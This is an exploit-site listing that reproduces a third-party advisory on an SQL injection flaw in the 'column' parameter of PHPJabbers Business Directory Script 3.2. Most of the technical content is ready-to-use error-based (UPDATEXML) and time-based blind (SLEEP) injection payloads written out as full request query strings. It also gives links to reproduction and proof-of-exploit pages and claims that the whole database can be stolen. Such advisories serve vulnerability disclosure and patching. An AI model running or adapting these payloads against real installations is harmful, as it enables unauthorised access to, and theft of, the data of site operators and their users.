Advertisement






Business Directory Script 3.2 SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2023-08-26
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080092

Below is a copy:

Business Directory Script 3.2 SQL Injection
## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `column` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the column parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. Additionally, the payload
(select*from(select(sleep(20)))a) was submitted in the column
parameter. The application took 20271 milliseconds to respond to the
request, compared with 230 milliseconds for the original request,
indicating that the injected SQL command caused a time delay. The
attacker can steal all information from the database of the server of
this application!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT
(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT
6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)

## Time spend:
01:35:00


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.